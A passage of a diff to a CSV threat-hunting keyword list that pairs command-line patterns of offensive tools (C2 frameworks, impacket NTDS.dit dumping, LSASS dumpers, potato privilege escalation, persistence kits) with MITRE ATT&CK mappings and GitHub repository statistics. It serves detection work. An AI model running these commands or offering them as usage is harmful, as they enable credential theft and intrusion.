TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* ssh2-enum-algos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-auth-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ssh-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1909,22 +1909,22 @@ "* ssl-poodle.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sslv2.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sslv2-drown.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* SspiUacBypass *","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"* SspiUacBypass *","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "* sstp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* st client wss://*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "* st teamserver *","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"* start covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"* start covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "* start_campaign.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"* start_hidden_process*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"* start_hidden_process*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "* steal_token /process:* /command:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"* stop covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"* stop covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "* striker.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* stun-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* stun-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* stuxnet-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* supermicro-ipmi-conf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"* Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "* -sV --script vulners *","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* svn-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* SW2_HashSyscall*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" @@ -1932,24 +1932,24 @@ "* --syscalls GetSyscallStub*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* -syscalls -sleep=*.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* --syscalls SysWhispers3*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* -system SYSTEM -ntds NTDS.dit LOCAL*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -system SYSTEM -ntds NTDS.dit -outputfile*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -system SYSTEM -ntds NTDS.dit LOCAL*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -system SYSTEM -ntds NTDS.dit -outputfile*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "* --syswhispers --jump*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* SysWhispers*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" -"* -t *https://autodiscover.*/autodiscover/autodiscover.xml*autodiscover*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"* -t *https://autodiscover.*/autodiscover/autodiscover.xml*autodiscover*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "* -t 127.0.0.1 -p 1337 *","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "* -t BindShell -p *pwned\pipe\spoolss*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "* -t C2concealer *","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" "* -t CreateProcessAsUserW -p *pwned\pipe\spoolss* -e *.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "* -t dcsync://* -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -t donut *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* -t pe2sh*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* -t schtaskbackdoor *","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" -"* -Target * -AllDomain *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -Target * -InitialGrooms *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - 